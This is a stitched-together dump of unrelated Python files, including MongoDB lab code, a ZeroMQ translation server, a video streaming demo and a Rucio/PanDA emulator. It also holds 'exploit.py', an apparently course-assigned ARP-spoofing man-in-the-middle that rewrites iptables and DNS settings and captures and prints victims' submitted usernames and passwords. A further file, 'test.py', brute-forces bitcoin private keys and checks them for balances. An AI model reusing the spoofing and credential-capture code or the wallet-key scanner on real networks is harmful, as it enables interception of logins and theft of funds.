for t, s, unused in profile:
print("{0:.1f}".format(t * 1000) + "\t" + s)
print('--------------------')
print('total: ' + str(profile[len(profile) - 1][2] - profile[0][2]))
print('--------------------')
def append(file, s):
with open(file, "a") as my_file:
my_file.write(str(s))
def clear_file(file):
with open(file, "w") as my_file:
my_file.write("")
def appendln(file, s):
append(file, s + "\n")
# from pygame import mixer
# mixer.init()
def say(s):
s = str(s)
print('saying: ' + s)
if os.name == 'posix':
system('say ' + s)
elif os.name == 'nt':
# tts = gTTS(text=s,lang='en')
# f = NamedTemporaryFile()
# tts.save(f.name)
# mixer.music.load(f.name)
# mixer.music.play()
pythoncom.CoInitialize()
speak = wincl.Dispatch("SAPI.SpVoice")
speak.Speak(s)
def micros():
return time.time() * 1000
def lines(f):
with open(f, 'r') as tsvin:
l = 0
last = 0
tsvr = csv.reader(tsvin, delimiter=',')
for i in tsvr:
l = l + 1
last = l - 1
return l
def last_line_n(f):
return lines(f) - 1
def is_int(s):
try:
int(s)
return True
except ValueError:
return False
def is_float(s):
try:
float(s)
return True
except ValueError:
return False
|
exploit.py
|
#Server base code obtained from: http://www.codexpedia.com/python/python-web-server-for-get-and-post-requests/
#Additional code has been added in do_POST for the assignment, same as malicious gateway post
# get_mac address obtained from: http://www.aviran.org/arp-poisoning-python-scapy/
#!/usr/bin/python
from scapy.all import *
from http.server import BaseHTTPRequestHandler, HTTPServer
from subprocess import run
import cgi, http, urllib, sys, threading
def get_mac_address():
my_macs = [get_if_hwaddr(i) for i in get_if_list()]
for mac in my_macs:
if(mac != "00:00:00:00:00:00"):
return mac
#set variables
my_mac = get_mac_address()
gateway = '10.0.0.1'
victim = '10.0.0.2'
#construct arp spoof packet
packet = Ether()/ARP(op=1,hwsrc=my_mac,psrc=gateway,pdst=victim)
#Http server to handle get and post request from alice
class GP(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_headers()
conn = http.client.HTTPSConnection("https-only.seclab.space")
conn.request("GET", "")
response = conn.getresponse()
data = response.read()
conn.close()
print (response.status, response.reason)
print(data)
self.wfile.write(data)
def do_POST(self):
self._set_headers()
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST'}
)
username = form.getvalue("username")
password = form.getvalue("password")
params = urllib.parse.urlencode({'username': username, 'password': password, 'action': 'show'})
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain"}
conn = http.client.HTTPSConnection("https-only.seclab.space")
conn.request("POST", "", params, headers)
response = conn.getresponse()
data = response.read()
conn.close()
print (response.status, response.reason)
print (data)
print ("username = " + form.getvalue("username")+", password = " + form.getvalue("password"))
self.wfile.write(data)
def setIpTables():
with open('/etc/resolv.conf', 'w+') as f:
f.write('nameserver 8.8.8.8')
print(run(['iptables', '-t', 'nat', '-A', 'POSTROUTING', '-o', 'eth0', '-j', 'MASQUERADE']))
print(run(['iptables', '-A', 'FORWARD', '-i', 'eth0', '-o', 'eth1', '-m', 'state', '--state', 'RELATED,ESTABLISHED', '-j', 'ACCEPT']))
print(run(['iptables', '-A', 'FORWARD', '-i', 'eth1', '-o', 'eth0', '-j', 'ACCEPT']))
print(run(['iptables', '-t', 'nat', '-A', 'PREROUTING', '-p', 'tcp', '-i', 'eth0', '-d 142.1.97.172', '--dport', '80', '-j', 'DNAT', '--to-destination', '10.0.0.3:8080']))
def runServer(server_class=HTTPServer, handler_class=GP, port=8080):
server_address = ('', port)
print(type(server_address), type(handler_class))
httpd = server_class(server_address, handler_class)
print ('Server running at localhost:8080...')
httpd.serve_forever()
#loop to keep sending packet
def sendPacket():
t=threading.Timer(2.0, sendPacket)
sendp(packet, verbose=0)
t.start()
if __name__ == "__main__":
setIpTables()
#run arp spoof packet sending function in background thread
thread = threading.Thread(target=sendPacket, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
runServer()
|
anonserv.py
|
import socket, sys, os, threading
class colors:
RED = '\033[31m'
YELLOW = '\33[33m'
GREEN = '\33[32m'
PINK = '\33[35m'
WHITE = '\33[37m'
def header():
return(colors.RED + '''
▄▄▄ ███▄ █ ▒█████ ███▄ █ ▄████▄ ██░ ██ ▄▄▄ ▄▄▄█████▓
▒████▄ ██ ▀█ █ ▒██▒ ██▒ ██ ▀█ █ ▒██▀ ▀█ ▓██░ ██▒▒████▄ ▓ ██▒ ▓▒
▒██ ▀█▄ ▓██ ▀█ ██▒▒██░ ██▒▓██ ▀█ ██▒ ▒▓█ ▄ ▒██▀▀██░▒██ ▀█▄ ▒ ▓██░ ▒░
░██▄▄▄▄██ ▓██▒ ▐▌██▒▒██ ██░▓██▒ ▐▌██▒ ▒▓▓▄ ▄██▒░▓█ ░██ ░██▄▄▄▄██░ ▓██▓ ░
▓█ ▓██▒▒██░ ▓██░░ ████▓▒░▒██░ ▓██░ ▒ ▓███▀ ░░▓█▒░██▓ ▓█ ▓██▒ ▒██▒ ░
▒▒ ▓▒█░░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▒░ ▒ ▒ ░ ░▒ ▒ ░ ▒ ░░▒░▒ ▒▒ ▓▒█░ ▒ ░░
▒ ▒▒ ░░ ░░ ░ ▒░ ░ ▒ ▒░ ░ ░░ ░ ▒░ ░ ▒ ▒ ░▒░ ░ ▒ ▒▒ ░ ░
░ ▒ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ▒ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-(By PKuz)-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
''')
ZOMBIES = []
USERS = {}
def server_start():
try:
IP = str(sys.argv[1])
PORT = int(sys.argv[2])
except:
print(colors.RED + "[*] Usage: python3 server.py <IP> <PORT>" + colors.WHITE)
sys.exit()
try:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((IP,PORT))
server.listen(10)
print(header())
print(colors.RED + '[' + colors.GREEN + '*' + colors.RED + '] Server successfully started on ' + IP + ':' + str(PORT) + '.' + colors.WHITE)
serv_key = gen_key(15)
print(colors.RED + '[' + colors.GREEN + '*' + colors.RED + '] Key: ' + serv_key + colors.WHITE)
except:
print(colors.RED + '[' + colors.YELLOW + '*' + colors.RED + '] Unable to start server on ' + IP + ':' + str(PORT) + '.' + colors.WHITE)
sys.exit()
try:
while(1):
c, a = server.accept()
creds = c.recv(2048).decode().split()
creds[1] = ' '.join(creds[1])
if creds[0] != str(serv_key):
import time
kickMSG = '[*] Kicked for invalid server credentials or duplicate username.'
c.send(bytes(kickMSG.encode()))
print(colors.YELLOW + 'Zombie kicked from ' + str(a) + ' for incorrect key.')
time.sleep(0.03)
c.close()
elif creds[1] in USERS.values():
c.close()
print(colors.YELLOW + 'Zombie kicked from ' + str(a) + ' for duplicate username.')
else:
print(colors.GREEN + 'Zombie connected from ' + str(a))
USERS[str(a)] = creds[1]
ZOMBIES.append(c)
anon = header()
c.send(bytes(anon.encode()))
thread = threading.Thread(target=vacuum, args=(c,a))
thread.start()
except:
os.system('cls' if os.name == 'nt' else 'clear')
print(colors.RED + '[' + colors.YELLOW + '*' + colors.RED + '] Server closed.' + colors.WHITE)
server.close()
os._exit(1)
def vacuum(c,a):
while(1):
info = c.recv(2048).decode()
if not info:
print(colors.YELLOW + 'Zombie disconnected from ' + str(a) + '.')
del USERS[str(a)]
ZOMBIES.remove(c)
c.close()
break
info = USERS[str(a)] + ': ' + info
for z in ZOMBIES:
z.send(info.encode())
def gen_key(x):
import secrets
return secrets.token_hex(x)
if __name__ == '__main__':
os.system('cls' if os.name == 'nt' else 'clear')
server_start()
|
loader.py
|
#!/bin/env python3
"""
M040 - Error Handling Lab Loader
--------------------------------
This is a multiprocessing script that processes the dataset file in
batches, where each spawned process will handle a portion of the file.
Usage:
loader.py [--uri=<uri>] [--file=<file>]
Options:
-h --help Show this help text.
--uri=<uri> MongoDB connection uri [default: mongodb://m040:27017/m040?replicaSet=M040]
--file=<file> Dataset file location [default: ./data.json]
"""
import pymongo
import json
from docopt import docopt
from itertools import islice
from multiprocessing import Process, Queue
def drop_dataset(uri):
"""
Drop this lab's collections
"""
mc = pymongo.MongoClient(uri)
db = mc.m040
db.drop_collection('cities')
db.drop_collection('city_stats')
def touch_collections(uri):
"""
Creates all necessary dataset collections
"""
mc = pymongo.MongoClient(uri)
db = mc.m040
db.city_stats.insert_one({"_id": "loader"})
db.create_collection('cities')
def handle_commit(s):
"""
Handles the commit operation.
"""
# LAB - needs error handling
try:
s.commit_transaction()
except Exception as exc:
# do something here
raise
def write_batch(batch, mc, s):
"""
Executes the batch write operation
"""
try:
s.start_transaction()
result = mc.m040.cities.insert_many(batch, session=s)
batch_total_population = sum(d['population'] for d in batch)
mc.m040.city_stats.update_one({'_id': 'loader'},
{"$inc": {"population_total": batch_total_population}},
session=s
)
handle_commit(s)
except (pymongo.errors.DuplicateKeyError) as dupex:
print("Duplicate Key Found: {}".format(dupex))
s.abort_transaction()
return(0,0)
return (batch_total_population,len(result.inserted_ids))
def load_data(q, batch, uri):
"""
Inserts the `batch` of documents into collections.
"""
mc = pymongo.MongoClient(uri)
batch_total_population = 0
batch_docs = 0
try:
# LAB - needs error handling
with mc.start_session() as s:
try:
batch_total_population,batch_docs = write_batch(batch, mc, s)
except Exception as exc:
# Do something here!
print("Error - what shall I do ??!??! {}".format(exc))
raise
q.put({"batch_pop": batch_total_population, "batch_docs": batch_docs })
except Exception as e:
print("Unexpected error found: {}".format(e))
def main(arguments):
"""
Error Handling Lab
------------------
1) Drops existing data
2) Create the collections
3) Starts transaction
4) Imports dataset
5) commits or aborts transaction
"""
# get MongoDB URI
uri = arguments['--uri']
# drop dataset
drop_dataset(uri)
# create collections
touch_collections(uri)
# Process Comms Queue
q = Queue(11)
# Process list
processes = []
#import dataset in batches
batch_size = 10
with open(arguments['--file'], 'rt') as fd:
for slice in iter(lambda: tuple(islice(fd, batch_size)),()):
batch = list(map(json.loads, slice))
processes.append( Process(target=load_data, args=(q, batch, uri)) )
for p in processes:
p.start()
for p in reversed(processes):
p.join()
total_processed_population = 0
total_processed_documents = 0
while q.qsize() > 0:
doc = q.get()
total_processed_population += doc['batch_pop']
total_processed_documents += doc['batch_docs']
print("Documents Inserted: {0}".format(total_processed_documents))
print("Total Population: {0}".format(total_processed_population))
if __name__ == '__main__':
arguments = docopt(__doc__)
main(arguments)
|
test.py
|
import threading
import os
import time
import random
import requests
import json
from bit import Key
from bit.format import bytes_to_wif
import traceback
maxPage = pow(2,256) / 128
#maxPage = 904625697166532776746648320380374280100293470930272690489102837043110636675
def getRandPage():
return random.randint(1, maxPage)
def getPage(pageNum):
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
num = (pageNum - 1) * 128 + 1
try:
for i in range(num, num + 128):
key1 = Key.from_int(i)
wif = bytes_to_wif(key1.to_bytes(), compressed=False)
key2 = Key(wif)
keyList.append(hex(i)[2:])
addrList.append(key2.address)
addrList.append(key1.address)
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + key2.address
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + key1.address
except:
pass
return [keyList, addrList, addrStr1, addrStr2]
'''
def getPage(pageNum):
try:
r = requests.get(url='http://directory.io/%d' % pageNum, timeout=5)
r = r.content
except:
return []
keys = r.split("how-this-works!/")
addrs = r.split("blockchain.info/address/")
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
for i in range(1, len(keys)):
key = keys[i].split("\"")[0]
keyList.append(key)
for i in range(1, len(addrs)):
addr = addrs[i].split("\"")[0]
addrList.append(addr)
if i % 2 == 1:
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + addr
else:
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + addr
return [keyList, addrList, addrStr1, addrStr2]
'''
def getBalances(addrStr):
balances = "security"
while True:
if "security" not in balances: break
secAddr = balances.split("effects address ")
if len(secAddr) >= 2:
secAddr = secAddr[1].split(".")[0]
addrStr = addrStr.replace(secAddr + "|", "")
addrStr = addrStr.replace("|" + secAddr, "")
try:
r = requests.get(url='http://blockchain.info/multiaddr?active=%s' % addrStr, timeout=5)
balances = r.text
except:
return
try:
balances = json.loads(balances)
balances = balances['addresses']
except:
print (balances)
return balances
getCount = 0
#fp_found = open("found.txt", "w+")
#fp_fund = open("fund.txt", "w+")
def getWallet():
global getCount
while True:
page = getRandPage()
pageRet = getPage(1)
try:
balancesRet = getBalances(pageRet[2])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 0
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i/2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
#fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
#if balance['final_balance'] > 0:
#fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print (isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
balancesRet = getBalances(pageRet[3])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 1
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i/2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
#fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
#if balance['final_balance'] > 0:
#fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print (isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
#fp_found.flush()
#fp_fund.flush()
except:
traceback.print_exc()
break
clearScreen()
print (getCount)
break
def clearScreen():
os.system('clear')
def main():
threads = []
for i in range(1):
threads.append(threading.Thread(target=getWallet,args=()))
for t in threads:
time.sleep(1.0)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
server.py
|
# -*- coding: utf-8 -*-
from logging import getLogger
from threading import Thread
from zmq import REQ, REP, Poller, POLLIN, Context, ROUTER, DEALER, proxy
import config
from translations_server.db import get_translation
from translations_server.lib import db
_LOG = getLogger(__name__)
_ENCODING = "utf-8"
_REQUEST_ENDPOINT = "inproc://requests"
_SYNC_ENDPOINT = "inproc://sync"
def _translate(lang, country, *key_plural_pairs):
""" Generator: get translations from the DB. """
# Group each two elements together to key and plural tuples.
key_plural_pairs = zip( # 1, 2, 3, 4, ... -> (1, 2), (3, 4), ...
key_plural_pairs[::2], key_plural_pairs[1::2])
for key, plural in key_plural_pairs:
plural = int(plural) if plural else None
translation = get_translation(lang, country, key, plural)
if translation is None:
extra = {
"lang": lang,
"country": country,
"plural": plural
}
_LOG.warning("Missing translation: %s", key, extra=extra)
yield translation or key
def _handle_request(parts):
""" Handle one translation request, translate and return the result.
In and out-puts are bytes.
:param parts: Translation fields:
- language
- country or `""`
- on or more pairs of key and plural form
:type parts: [bytes]
:return: The translations or `[b""]` if there was a encoding or format
error.
:rtype: [bytes] or [b""]
"""
translations = [b""] # error
try:
parts = [p.decode(_ENCODING) for p in parts]
except UnicodeDecodeError:
_LOG.exception("Decoding error", extra={"encoding": _ENCODING})
else:
if len(parts) < 4 or len(parts) % 2:
_LOG.warning("Wrong count of arguments.")
else:
lang, country = parts[:2]
try:
translations = [
t.encode(_ENCODING)
for t in _translate(lang, country, *parts[2:])]
except UnicodeEncodeError:
_LOG.exception(
"Could not encode translation!",
extra={"encoding": _ENCODING})
finally:
# Put connection back in the DB Pool
db.putback()
return translations
def _handle_requests(context):
""" This is supposed to run as a background thread.
It listens for translation requests and answers them until a message is
arrived on the sync socket, whereupon the function (thread) ends.
:type context: zmq.Context
"""
sync_socket = context.socket(REQ)
sync_socket.connect(_SYNC_ENDPOINT)
requests_socket = context.socket(REP)
requests_socket.connect(_REQUEST_ENDPOINT)
_LOG.debug("Synchronizing worker")
sync_socket.send(b"")
sync_socket.recv()
sync_socket.send(b"")
keep_running = True
poller = Poller()
poller.register(requests_socket, POLLIN)
poller.register(sync_socket, POLLIN)
_LOG.debug("Running worker")
while keep_running:
sockets = dict(poller.poll())
if requests_socket in sockets:
try:
response = _handle_request(requests_socket.recv_multipart())
except Exception: # pylint: disable=broad-except
_LOG.critical("Handler crashed!", exc_info=True)
response = [b""]
requests_socket.send_multipart(response)
if sync_socket in sockets:
sync_socket.recv()
keep_running = False
_LOG.debug("Terminating worker")
def _start_workers(context, sync_socket, count, timeout=None):
"""
:type context: zmq.Context
:type sync_socker: zmq.Socket
:type count: int
:param timeout: Timeout for waiting for worker messages, in milliseconds.
:type timeout: float
"""
_LOG.debug("Starting workers...")
worker_threads = [
Thread(
target=_handle_requests, name="worker {}".format(i),
args=(context, ))
for i in range(count)]
for thread in worker_threads:
thread.start()
_LOG.debug("Synchronizing workers...")
poller = Poller()
poller.register(sync_socket, POLLIN)
worker_identities = []
for _ in worker_threads:
sockets = dict(poller.poll(timeout=timeout))
if sync_socket in sockets:
worker_identities.append(sync_socket.recv_multipart()[0])
else:
raise RuntimeError("Worker did not respond in time.")
for worker_identity in worker_identities:
sync_socket.send_multipart([worker_identity, b"", b""])
for _ in worker_identities:
sockets = dict(poller.poll(timeout=timeout))
if sync_socket in sockets:
sync_socket.recv_multipart()
else:
raise RuntimeError("Worker did not respond in time.")
_LOG.debug("Workers synchronized.")
return worker_threads, worker_identities
def _shut_down_workers(
sync_socket, worker_threads, worker_identities, timeout=None):
"""
:type sync_socker: zmq.Socket
:type worker_threads: [threading.Thread]
:type worker_identities: [bytes]
:param timeout: Timeout for waiting for worker threads, in seconds.
:type timeout: float
"""
_LOG.debug("Terminating workers...")
for worker_identity in worker_identities:
sync_socket.send_multipart([worker_identity, b"", b""])
for i, thread in enumerate(worker_threads):
thread.join(timeout=timeout)
if thread.is_alive():
raise RuntimeError("Worker {} did not terminate.".format(i))
_LOG.debug("Workers terminated.")
def run(port):
""" Run a translations server at a specific port.
It always listens on all available network devices!
"""
context = Context(1)
sync_socket = context.socket(ROUTER)
sync_socket.bind(_SYNC_ENDPOINT)
frontend = context.socket(ROUTER)
frontend.bind("tcp://*:{}".format(port))
# Socket facing services
backend = context.socket(DEALER)
backend.bind(_REQUEST_ENDPOINT)
try:
worker_threads, worker_identities = _start_workers(
context, sync_socket, int(config.WORKERS),
int(config.TIMEOUT_IN_MILLISECONDS))
_LOG.debug("Running device...")
try:
proxy(frontend, backend)
except KeyboardInterrupt:
print("\rShutting down...")
frontend.close()
frontend = None
_shut_down_workers(sync_socket, worker_threads, worker_identities, 5)
finally:
if frontend is not None:
frontend.close()
db.close()
backend.close()
sync_socket.close()
_LOG.debug("Done")
|
demo_rtp_processes.py
|
import numpy as np
import cv2
from multiprocessing import Process
def send():
cap_send = cv2.VideoCapture('videotestsrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
out_send = cv2.VideoWriter('appsrc ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000',cv2.CAP_GSTREAMER,0, 20, (320,240), True)
if not cap_send.isOpened() or not out_send.isOpened():
print('VideoCapture or VideoWriter not opened')
exit(0)
while True:
ret,frame = cap_send.read()
if not ret:
print('empty frame')
break
out_send.write(frame)
cv2.imshow('send', frame)
if cv2.waitKey(1)&0xFF == ord('q'):
break
cap_send.release()
out_send.release()
def receive():
cap_receive = cv2.VideoCapture('udpsrc port=5000 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
if not cap_receive.isOpened():
print('VideoCapture not opened')
exit(0)
while True:
ret,frame = cap_receive.read()
if not ret:
print('empty frame')
break
cv2.imshow('receive', frame)
if cv2.waitKey(1)&0xFF == ord('q'):
break
#cap_receive.release()
if __name__ == '__main__':
s = Process(target=send)
r = Process(target=receive)
s.start()
r.start()
s.join()
r.join()
cv2.destroyAllWindows()
|
panda_new.py
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Ralph Vigne, <ralph.vigne@cern.ch>, 2013
import datetime
import bisect
import os
import pickle
import sys
import threading
import time
from Queue import Queue
from random import choice, gauss, sample, random, randint
from requests.exceptions import ConnectionError
from rucio.client import Client
from rucio.common.exception import DatabaseException, DataIdentifierNotFound, UnsupportedOperation
from rucio.common.utils import generate_uuid as uuid
from rucio.core import monitor
from rucio.tests.emulation.ucemulator import UCEmulator
class UseCaseDefinition(UCEmulator):
"""
Implements all PanDA use cases.
"""
@UCEmulator.UseCase
def CREATE_TASK(self, task_type, rses, input, output, file_transfer_duration, bulk, threads, safety_delay):
target_rses = list()
task_type_id = task_type.split('.')[1].split('-')[0]
task_number = '%08d' % randint(0, 100000000)
if threads:
sem = threading.BoundedSemaphore(threads)
if 'output_datasets_per_datatype' in output.keys():
output_datasets_per_datatype = output['output_datasets_per_datatype']
if (output_datasets_per_datatype % 1) != 0: # Fraction is a decimal, decide final number by chance
output_datasets_per_datatype = int(output_datasets_per_datatype) if ((output_datasets_per_datatype % 1) < random()) else int(output_datasets_per_datatype) + 1
else:
output_datasets_per_datatype = 1
input_ds_used = False if input['dss'] is None else True
if 'create_subs' in output.keys():
create_sub_ds = output['create_subs'] == "True"
else:
create_sub_ds = False
if (task_type.startswith('user') or task_type.startswith('group')): # User task is created
ext = task_type.split('.')[0]
create_dis_ds = False
log_ds = False
rse = None
for i in range(output_datasets_per_datatype):
while (rse is None) or (rse in target_rses):
rse = choice(rses)
target_rses.append(rse)
else: # Production task output stuff is created
ext = 'out'
rse = choice(rses)
for i in range(output_datasets_per_datatype):
target_rses.append(rse)
if input_ds_used:
if input['dis_ds_probability'] == 0:
create_dis_ds = False
elif input['dis_ds_probability'] == 1:
create_dis_ds = True
else:
create_dis_ds = (input['dis_ds_probability'] >= random())
else:
create_dis_ds = False
log_ds = True
client = Client(account='panda')
if 'lifetime' not in output.keys():
output['lifetime'] = None
# ----------------------- List replicas and derive list of files from it -------------------
replicas = list()
if input_ds_used:
while input_ds_used and len(input['dss']) and not len(replicas):
temp = input['dss'].pop()
now = time.time()
print '== PanDA: Checking %s as input' % temp
try:
with monitor.record_timer_block('panda.list_replicas'):
replicas = [f for f in client.list_replicas(scope=temp[0], name=temp[1])]
except (DatabaseException, DataIdentifierNotFound, ConnectionError):
replicas = list()
pass
delta = time.time() - now
if len(replicas):
monitor.record_timer('panda.list_replicas.normalized', delta / len(replicas))
if len(replicas) == 0:
print '== PanDA: Empty input dataset provided'
monitor.record_counter('panda.tasks.%s.EmptyInputDataset' % task_type, 1)
return {'jobs': [], 'task': [], 'subs': []}
input['scope'] = temp[0]
input['ds_name'] = temp[1]
if log_ds: # Production task
output['scope'] = temp[0]
# Should be changed when the response from list_replicas is updated
files = list()
file_keys = list()
cnt_rses = dict()
for r in replicas:
if '%s:%s' % (r['scope'], r['name']) not in file_keys:
file_keys.append('%s:%s' % (r['scope'], r['name']))
files.append({'scope': r['scope'], 'name': r['name'], 'bytes': r['bytes']})
if ('max_jobs' in input.keys()) and (len(files) > (input['max_jobs'] * input['number_of_inputfiles_per_job'])):
monitor.record_counter('panda.tasks.%s.limited_input' % task_type, 1)
break
for tmp_rse in r['rses']:
if tmp_rse not in cnt_rses.keys():
cnt_rses[tmp_rse] = 0
cnt_rses[tmp_rse] += 1
print '== PanDA: Replica distribution over RSEs: %s files -> %s' % (len(files), cnt_rses)
if not (task_type.startswith('user') or task_type.startswith('group')): # User task is created
rse = sorted(cnt_rses, key=cnt_rses.get, reverse=True)[0]
for i in range(target_rses):
target_rses[i] = rse
monitor.record_counter('panda.tasks.%s.input_files' % task_type, len(files)) # Reports the number of files in the intput dataset of the task type
# Release memory by cleaning the two objects
file_keys = None
# ------------------------------- Determine metadata for output dataset ------------------------------------
meta = dict()
success = False
retry = 1
print '---- List meta'
while not success:
try:
with monitor.record_timer_block('panda.get_metadata'):
meta_i = client.get_metadata(scope=input['scope'], name=input['ds_name'])
success = True
except (DatabaseException, ConnectionError):
monitor.record_counter('panda.retry.get_metadata.%s' % (retry), 1)
retry += 1
if retry > 5:
monitor.record_counter('panda.tasks.%s.missing_input_meta.timeout' % (task_type), 1)
raise
for key in ['stream_name', 'project']:
if meta_i[key] is not None:
meta[key] = meta_i[key]
else:
monitor.record_counter('panda.tasks.%s.missing_input_meta.%s' % (task_type, key), 1)
if key == 'stream_name':
meta[key] = 'physics_Egamma'
elif key == 'project':
meta[key] = 'mc12_8TeV'
else:
meta[key] = 'NotGivenByInput'
else:
output['scope'] = choice(['mc12_8TeV', 'mc13_14TeV'])
input['ds_name'] = uuid()
meta = {'stream_name': 'dummy', 'project': output['scope']}
input['number_of_inputfiles_per_job'] = 1
files = ['file_%s' % f for f in xrange(input['max_jobs'])]
meta['run_number'] = int(time.time() / (3600 * 24))
meta['version'] = uuid()
# ----------------------------------- Create final output - dataset(s) ---------------------------------------
print '-------------- Create output DS'
final_dss = {}
for out_ds in output['meta']: # Create output containers(s)
meta['prod_step'] = out_ds.split('.')[0]
meta['datatype'] = out_ds.split('.')[1]
ds = '.'.join([meta['project'], str(meta['run_number']), meta['stream_name'], meta['prod_step'], meta['datatype'], meta['version'], ext])
final_dss[ds] = meta.copy()
if log_ds:
ds = '.'.join([meta['project'], str(meta['run_number']), meta['stream_name'], meta['prod_step'], meta['datatype'], meta['version'], 'log'])
final_dss[ds] = meta.copy()
temp_ds = list()
for fds in final_dss:
temp = list()
success = False
retry = 1
while not success:
print 'Creating container: cnt_%s' % fds
try:
with monitor.record_timer_block('panda.add_container'):
client.add_container(scope=output['scope'], name='cnt_%s' % (fds))
monitor.record_counter('panda.tasks.%s.container' % task_type, 1) # Reports the creation of a container
success = True
except (DatabaseException, ConnectionError):
monitor.record_counter('panda.retry.add_container.%s' % (retry), 1)
retry += 1
if retry > 5:
raise
time.sleep(randint(1, 2))
for i in range(output_datasets_per_datatype):
final_dss[fds].update({'guid': str(uuid())})
dsn2 = '%s.%s' % (fds, i)
out_ds = {'scope': output['scope'], 'name': dsn2, 'dids': [], 'meta': final_dss[fds].copy(),
'rules': [{'account': output['account'], 'copies': 1, 'rse_expression': target_rses[i], 'grouping': 'DATASET', 'lifetime': output['lifetime']}]}
temp.append(out_ds)
success = False
retry = 1
while not success:
try:
with monitor.record_timer_block(['panda.add_datasets', ('panda.add_datasets.normalized', len(temp))]):
client.add_datasets(temp)
monitor.record_counter('panda.tasks.%s.output_datasets' % task_type, len(temp)) # Reports the number of output datasets for the tasktype (including log datasets)
success = True
except (DatabaseException, ConnectionError):
monitor.record_counter('panda.retry.add_datasets.%s' % (retry), 1)
retry += 1
if retry > 5:
raise
time.sleep(randint(1, 2))
success = False
retry = 1
while not success:
try:
with monitor.record_timer_block(['panda.add_datasets_to_container', ('panda.add_datasets_to_container.normailzed', len(temp))]):
client.add_datasets_to_container(scope=output['scope'], name='cnt_%s' % (fds), dsns=[{'scope': d['scope'], 'name': d['name']} for d in temp])
success = True
except (DatabaseException, ConnectionError):
monitor.record_counter('panda.retry.add_datasets_to_container.%s' % (retry), 1)
retry += 1
if retry > 5:
raise
time.sleep(randint(1, 2))
temp_ds += temp
final_dss = [dsn['name'] for dsn in temp_ds]
# -------------------------------- Derive/Create dis and subdatasets ------------------------------------------
print '-------------- Create dis/sub DS'
jobs = []
files_in_ds = []
dis_ds = None
computing_rse = None
job_count = 0
inserts_dis = list()
inserts_sub = list()
if 'number_of_inputfiles_per_job' not in input.keys():
input['number_of_inputfiles_per_job'] = 1
# ----------------------- Derive number of jobs depending on the input dataset ------------------------
job_count = float(len(files)) / input['number_of_inputfiles_per_job']
if (job_count % 1) != 0:
job_count = int(job_count) + 1
if ('max_jobs' in input.keys()) and (job_count >= input['max_jobs']):
job_count = input['max_jobs']
used_rses = dict()
if create_dis_ds: # Creating DIS - Datasets
count_dis = float(job_count) / input['jobs_per_dis']
if (count_dis % 1) != 0:
count_dis = int(count_dis) + 1
for i in range(int(count_dis)):
id = uuid()
dis_ds = '%s_DIS_%s' % (input['ds_name'], id)
fpd = float(input['jobs_per_dis']) * input['number_of_inputfiles_per_job']
start = int(i * fpd) # If not int, remove digits to get the lower number
fpd = int(fpd) + 1 if (fpd % 1) != 0 else int(fpd) # Must include every file that is (partly) used
end = start + fpd
if end > len(files):
print '== PanDA Warning: Missing proper number of files per DIS (%s - %s (Files: %s))' % (start, end, len(files))
end = len(files)
start = end - fpd if (end - fpd) > 0 else 0
print '== PanDA Warning: Chosen %s - %s instead' % (start, end)
files_in_ds = [files[r] for r in range(start, end)]
if not len(files_in_ds):
break
if create_sub_ds:
while (target_rses[0] == computing_rse) or (computing_rse is None):
computing_rse = choice(rses) # Random choice of the computing RSE
else:
computing_rse = target_rses[0] # If no sub, no output is moved, therefore target rse = computing rse
temp_job_count = int(float(len(files_in_ds)) / input['number_of_inputfiles_per_job'])
if temp_job_count > input['jobs_per_dis']:
temp_job_count = input['jobs_per_dis']
